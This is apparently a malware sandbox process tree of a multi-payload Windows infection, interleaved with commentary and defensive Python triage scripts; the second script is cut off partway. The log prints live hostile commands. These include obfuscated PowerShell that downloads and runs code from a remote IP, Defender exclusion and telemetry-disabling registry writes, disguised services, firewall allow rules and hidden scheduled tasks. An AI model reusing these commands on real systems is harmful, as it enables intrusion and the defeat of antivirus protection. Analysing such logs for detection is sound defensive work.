C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe" -Force4⤵
-
C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"C:\Users\Admin\Documents\mNNTeptv39xQbiKXUFJlGYda.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 14205⤵
- Program crash
-
C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pxsqodyn.exe" C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\pxsqodyn.exe /d\"C:\Users\Admin\Documents\bNDiBhKxC6KPXgLxJ0eAvuwe.exe\""4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4745.bat" "4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 12724⤵
- Program crash
-
C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe"C:\Users\Admin\Documents\kv93OZJK9SMSrQ5lj2ktTVeO.exe"3⤵
-
C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe"C:\Users\Admin\Documents\s7PsoPAUXK8A7maG9KixPMeB.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe"C:\Users\Admin\Documents\BKq0ajiZJzEbtqBPqp6wgyDQ.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7316" "2120" "2160" "2212" "0" "0" "2216" "0" "0" "0" "0" "0"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe"C:\Users\Admin\Documents\onGvjMU2m141G5PV7GmGrEm_.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 4724⤵
- Program crash
-
C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe"C:\Users\Admin\Documents\QnI7RpUVX7ROr0hQDhUrsLCG.exe"3⤵
-
C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe"C:\Users\Admin\Documents\WjDle5eyOc3IUP8D91U974yX.exe"3⤵
-
C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe"C:\Users\Admin\Documents\tFapeliATlitnaPwSm6XyzKg.exe"3⤵
-
C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe"C:\Users\Admin\Documents\3TMzwVzv2jTxn7kvP1onmpZ_.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe"C:\Users\Admin\Documents\X7PsIcqFEwOeJ8J1mHuG8tkH.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe"C:\Users\Admin\Pictures\Adobe Films\yEh1fHbg0KS9MoIqM_RZb1ql.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe"C:\Users\Admin\Pictures\Adobe Films\1GZC719qoMDYIcm4jeh_X6ZB.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe"C:\Users\Admin\Pictures\Adobe Films\oIFkiwq3aVOYs7QIoaGhfkcL.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe"C:\Users\Admin\Pictures\Adobe Films\__2y_sbBF_l0QMkjWV41ogTS.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe"C:\Users\Admin\Pictures\Adobe Films\MUyura5UTrq9ndaOYIIYsVtE.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe"C:\Users\Admin\Pictures\Adobe Films\8toxyvMY5eftDXbfHZ5Nkspi.exe"5⤵
-
C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe"C:\Users\Admin\Documents\qwLZbRWI5olGVoLz1AeO9sBt.exe"3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
-
C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe"C:\Users\Admin\Documents\8tlxMPYDw6gtZ278TNDrgSFv.exe"3⤵
-
C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe"C:\Users\Admin\Documents\hvjoV9uoVBrkQ52viZaB6CDF.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 4844⤵
- Program crash
-
C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"3⤵
-
C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"C:\Users\Admin\Documents\qwVE9lVPJ5BFPzZyglrA04yI.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 5645⤵
- Program crash
-
C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe"C:\Users\Admin\Documents\eCZwUXcf2v4T9aCxpNBSxNEf.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 4924⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Litever01.exe"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe"C:\Users\Admin\Documents\Zh8HfuR0H99IFab95QhRkd_A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 4684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 5124⤵
- Program crash
-
C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe" -Force4⤵
-
C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"C:\Users\Admin\Documents\2u2YsUgpyr8uoBqHizKdCUQM.exe"4⤵
-
C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe"C:\Users\Admin\Documents\7E4KGS5KRYdTYM9UbhbVCkXW.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 10084⤵
- Program crash
-
C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe"C:\Users\Admin\Documents\zsfCb6oFQmmDs_S2Bbddwzsl.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe"C:\Users\Admin\AppData\Local\Temp\1624857a-7bc6-4f8c-9976-de4f7227adf1.exe"4⤵
-
C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe"C:\Users\Admin\Documents\WRV_nd3147gQ3tPAc_hVHB_8.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#614⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 6084⤵
- Program crash
-
C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe"C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\_7j7HuriYtP_9nQOmZOUnbSw.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im _7j7HuriYtP_9nQOmZOUnbSw.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe"C:\Users\Admin\Documents\YStoivV3td8fghxqUu2SgpQ_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fskgslo.exe" C:\Windows\SysWOW64\snwpteqq\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\fskgslo.exe /d\"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe\"" type= own start= auto DisplayName= "wifi support"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description snwpteqq "wifi internet conection"4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq4⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵
-
C:\Users\Admin\kxplxqt.exe"C:\Users\Admin\kxplxqt.exe" /d"C:\Users\Admin\Documents\b2B20UBKQvo9NdMQVBat3qrA.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vntucuvk.exe" C:\Windows\SysWOW64\snwpteqq\5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config snwpteqq binPath= "C:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d\"C:\Users\Admin\kxplxqt.exe\""5⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start snwpteqq5⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul5⤵
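The sequence just above (mkdir under SysWOW64, move of a freshly dropped file out of %TEMP%, sc create with the display name "wifi support" and the dropper's own path passed as /d"...", sc start, then an inbound netsh allow rule for SysWOW64\svchost.exe), together with the csrss firewall rule added earlier under Info.exe and the PowerControl scheduled tasks created with /rl HIGHEST, is the kind of command-line chain a detection engineer correlates rather than alerts on line by line. The Python below is an added example, not part of this report or of the malware: it takes those command lines (copied from the tree above, plus one benign sc query as a control) and turns them into findings. Its regexes, finding fields and the system-directory list are assumptions of the example, not sandbox logic.

```python
"""Persistence triage over sandbox process command lines.

Added example, not part of this report or of the malware it records. It
correlates the cmd /C move, sc create/config, sc start, netsh advfirewall
and schtasks /create command lines from the process tree above into
findings. The regexes, finding fields and directory lists are assumptions
of this example, not sandbox or vendor logic.
"""
import re
from typing import Dict, List, Tuple

# Constructed input: (image, command line) pairs copied from the process
# tree in this report, plus one benign `sc query` as a control.
EVENTS: List[Tuple[str, str]] = [
    ("cmd.exe", '"C:\\Windows\\System32\\cmd.exe" /C move /Y '
                '"C:\\Users\\Admin\\AppData\\Local\\Temp\\fskgslo.exe" C:\\Windows\\SysWOW64\\snwpteqq\\'),
    ("sc.exe", '"C:\\Windows\\System32\\sc.exe" create snwpteqq binPath= "C:\\Windows\\SysWOW64\\snwpteqq\\fskgslo.exe '
               '/d\\"C:\\Users\\Admin\\Documents\\b2B20UBKQvo9NdMQVBat3qrA.exe\\"" type= own start= auto DisplayName= "wifi support"'),
    ("sc.exe", '"C:\\Windows\\System32\\sc.exe" start snwpteqq'),
    ("netsh.exe", '"C:\\Windows\\System32\\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" '
                  'dir=in action=allow program="C:\\Windows\\SysWOW64\\svchost.exe" enable=yes>nul'),
    ("netsh.exe", 'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes'),
    ("schtasks.exe", 'schtasks /create /f /RU "Admin" /tr "C:\\Program Files (x86)\\PowerControl\\PowerControl_Svc.exe" '
                     '/tn "PowerControl LG" /sc ONLOGON /rl HIGHEST'),
    ("sc.exe", '"C:\\Windows\\System32\\sc.exe" query wuauserv'),
]

MOVE_RE = re.compile(r'\bmove\s+(?:/y\s+)?"?([^"\s]+)"?\s+"?([^"\s]+)"?', re.I)
# The binPath= value may contain \" escapes (the dropper path is passed as /d"...").
SC_INSTALL_RE = re.compile(r'\b(create|config)\s+(\S+)\s.*?binPath=\s*"((?:[^"\\]|\\.)*)"', re.I)
SC_START_RE = re.compile(r'\bstart\s+(\S+)', re.I)
NETSH_RULE_RE = re.compile(r'advfirewall\s+firewall\s+add\s+rule\s+(.*)', re.I)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
TASK_OPT_RE = re.compile(r'/(tn|tr|sc|rl|ru)\s+(?:"([^"]*)"|(\S+))', re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TEMP_MARKER = "\\appdata\\local\\temp\\"


def _parent(path: str) -> str:
    """Lower-cased directory that contains `path`, without trailing backslash."""
    return path.rstrip("\\").rsplit("\\", 1)[0].lower()


def triage(events: List[Tuple[str, str]]) -> List[Dict]:
    findings: List[Dict] = []
    staged: Dict[str, str] = {}     # directory -> file moved into it from %TEMP%
    services: Dict[str, Dict] = {}  # service name -> its finding, for `sc start`
    for image, cmd in events:
        image = image.lower()
        if image == "cmd.exe":
            m = MOVE_RE.search(cmd)
            if m and TEMP_MARKER in m.group(1).lower():
                src, dst = m.group(1), m.group(2)
                # A destination ending in "\" is the directory itself (assumption).
                dst_dir = dst.rstrip("\\").lower() if dst.endswith("\\") else _parent(dst)
                staged[dst_dir] = src
        elif image == "sc.exe":
            m = SC_INSTALL_RE.search(cmd)
            if m:
                name, binpath = m.group(2), m.group(3)
                binary, _, args = binpath.partition(" ")   # assumes an unquoted image path
                args = args.replace('\\"', '"')
                finding = {
                    "type": "service", "name": name, "binary": binary, "args": args,
                    "staged_from_temp": _parent(binary) in staged,
                    "references_user_path": "\\users\\" in args.lower(),
                    "started": False,
                }
                services[name.lower()] = finding
                findings.append(finding)
                continue
            m = SC_START_RE.search(cmd)
            if m and m.group(1).lower() in services:
                services[m.group(1).lower()]["started"] = True
        elif image == "netsh.exe":
            m = NETSH_RULE_RE.search(cmd)
            if m:
                kv = {k.lower(): (q or b) for k, q, b in KV_RE.findall(m.group(1))}
                if kv.get("action", "").lower() == "allow" and kv.get("dir", "").lower() == "in":
                    program = kv.get("program", "")
                    findings.append({
                        "type": "firewall_allow", "rule": kv.get("name", ""), "program": program,
                        "program_outside_system_dirs": not program.lower().startswith(SYSTEM_DIRS),
                    })
        elif image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
            opts = {k.lower(): (q or b) for k, q, b in TASK_OPT_RE.findall(cmd)}
            findings.append({
                "type": "scheduled_task", "name": opts.get("tn", ""), "command": opts.get("tr", ""),
                "schedule": opts.get("sc", "").upper(), "run_as": opts.get("ru", ""),
                "runlevel_highest": opts.get("rl", "").upper() == "HIGHEST",
            })
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f)
```

The service finding carries the two facts that matter for triage and that neither `sc create` nor the `move` shows alone: the service image was staged out of %TEMP%, and it is started with the original dropper path as an argument. The svchost.exe rule does not trip the "outside system directories" check (SysWOW64\svchost.exe is a real binary), which is exactly why the page's later entry of vntucuvk.exe spawning a bare `svchost.exe` is the place to look next; the csrss rule does trip it because C:\Windows\rss\ is not a Windows directory.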
-
C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe"C:\Users\Admin\Documents\bL85TOQU5EEEmVqgNQhYQtof.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe"C:\Users\Admin\Documents\UasdIN9S3pk1MBF6e1GkKLMu.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSF5D7.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1DB2.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grsZRWkjR" /SC once /ST 00:34:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
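The Install.exe chain above weakens Defender in two ways. It writes policy-hive values (Exclusions\Extensions = exe and Spynet\SpyNetReporting = 0, each to both the 32-bit and 64-bit registry views), proxying reg.exe through forfiles so that the tree shows forfiles, then cmd.exe, then reg.exe instead of the installer itself; elsewhere in the tree other payloads take the direct route with Add-MpPreference exclusions. The scheduled task it then creates runs a base64-encoded PowerShell one-liner. As an added example, not part of this report or of the malware, the Python below scans those command lines (copied from the tree, plus one constructed benign REG ADD as a control), follows the forfiles proxy into the chained REG ADD calls, classifies each Defender change, and decodes the -EncodedCommand payload. Its regexes, finding names and the control line are the example's own assumptions.

```python
"""Defender-tampering triage over sandbox process command lines.

Added example, not part of this report or of the malware it records. It
scans command lines such as the Add-MpPreference, forfiles, REG ADD and
schtasks lines in the process tree above for Defender exclusions, writes
to the Defender policy hive (including the Spynet cloud-reporting switch),
proxy execution through forfiles, and -EncodedCommand payloads, which it
decodes. Regexes, finding names and the benign control line are
assumptions of this example.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed input: command lines copied from this report's process tree,
# plus one benign REG ADD (outside the Defender policy hive) as a control.
EVENTS: List[str] = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference '
    '-ExclusionPath "C:\\Users\\Admin\\Documents\\mNNTeptv39xQbiKXUFJlGYda.exe" -Force',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force',
    '"C:\\Windows\\System32\\forfiles.exe" /p c:\\windows\\system32 /m cmd.exe /c "cmd /C '
    'REG ADD \\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\" /f /v \\"exe\\" /t REG_SZ /d 0 /reg:32&'
    'REG ADD \\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\" /f /v \\"exe\\" /t REG_SZ /d 0 /reg:64&"',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    'schtasks /CREATE /TN "grsZRWkjR" /SC once /ST 00:34:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden '
    '-EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'REG ADD "HKCU\\Software\\ExampleVendor\\ExampleApp" /v Installed /t REG_DWORD /d 1 /f',  # constructed control
]

MPPREF_RE = re.compile(r"Add-MpPreference\s+(.*)", re.I)
EXCL_OPT_RE = re.compile(r'-(Exclusion\w+)\s+(?:"([^"]*)"|(\S+))', re.I)
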